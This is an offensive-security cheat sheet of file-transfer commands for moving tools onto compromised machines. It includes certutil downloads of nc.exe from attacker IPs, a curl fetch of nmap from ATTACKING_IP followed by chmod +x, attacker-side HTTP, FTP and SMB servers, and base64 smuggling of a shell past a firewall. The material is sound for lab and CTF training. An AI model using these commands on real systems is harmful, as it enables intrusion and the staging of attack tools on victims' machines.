File Transfer - Quick Commands
Certutil (Windows)
Certutil.exe -urlcache -f http://10.10.10.10/file.txt file.txtcertutil.exe -verifyctl -split -f http://10.10.10.32:8000/nc.exePython
HTTP
# Python3 Opens port 80 as an http server to exfil data
$ python3 -m http.server 80
# Python2
$ python -m SimpleHTTPServer 80You can navigate to the IP and port 80 (or whatever port you set) and browse the directory.
You can chain this with certutil and prop up the http server on the attacker machine and use certutil to transfer tools over to the victim machine (Windows).
FTP
# Attacker machine
# Python2
$ python -m pyftpdlib 21
# Python3
$ python3 -m pyftpdlib -p 21 --write# Windows Machine (victim)
>ftp {Attacker IP}
PHP
$ sudo php -S 0.0.0.0:80
PHP 7.4.15 Development Server (http://0.0.0.0:80) startedBase64
In some cases, we may not be able to transfer the file. For example, the remote host may have firewall protections that prevent us from downloading a file from our machine. In this type of situation, we can use a simple trick to base64 encode the file into base64 format, and then we can paste the base64 string on the remote server and decode it. For example, if we wanted to transfer a binary file called shell, we can base64 encode it as follows:
# Get the Base64 of the file
$ base64 shell -w 0
Now copy the base64 string and go to the remote host and decode it and pipe it into a file:
$ echo {base64 string} | base64 -d > shellSCP (Requires SSH Access)
To use Secure Copy (SCP)
$ scp linenum.sh user@remotehost:/tmp/linenum.shlinenume.sh: This is the file to transfer/tmp/linenum.sh: You must specify the destination directory and filename for the transferred file
To use scp with an ssh access key:
scp -i <ssh_key> <file to transfer> user@<remotehost>:/home/user/filenameTo transfer a directory:
$ scp -i id_rsa -r <Directory> adminuser@10.10.155.5:/home/adminuser/<Directory>Wget (Linux)
Downloading a file and saving it with a specific name:
$ wget -O myfile.zip https://example.com/file.zipResuming a download:
If a download is interrupted, you can resume it with the -c option:
$ wget -c https://example.com/largefile.zipDownloading multiple files:
$ wget https://example.com/file1.zip https://example.com/file2.zipDownloading in the Background:
To download a file in the background (i.e., without holding up your terminal), use the -b option:
$ wget -b <URL>Adjusting Speed Limit:
If needed, you can limit the download speed with --limit-rate:
$ wget --limit-rate=<rate> <URL>Additional Options
Verbose Mode: Use
-vto enable verbose output, showing detailed information about the download process.User Authentication: Use
--userand--passwordoptions for sites requiring authentication.Using Proxy: Use
--proxy-userand--proxy-passwordfor proxy authentication.
cURL
If you are on a compromised machine you can use:
curl <ip of attacker>:<port python server is running>/<filename> -o /<dir on victim>/filename
Example transferring over nmap and changing permissions of the file:
curl ATTACKING_IP/nmap -o /tmp/nmap-USERNAME && chmod +x /tmp/nmap-USERNAMEMetasploit
Upload/Download feature, so if we have a meterpreter shell it is very easy to upload/download a file
SMBServer.py
Run smbserver.py, and set the shareName and sharePath:
$ smbserver.py p .smbserver.py: Refers to the smbserver.py script, which is part of the Impacket toolkit. This script allows you to create an SMB server.p: share name that will be created and can be accessed.: The dot represents the current directory. It specifies the path to the directory that you want to share as an SMB share. In this case, it means the current directory in which you are running the command.
Now from the Windows machine on the same network, you can copy from the share you setup on the Kali box:
copy \\<Kali IP>\p\<filename>"
Validating File Transfers
To validate the format of a file, we can run the file command on it:
Last updated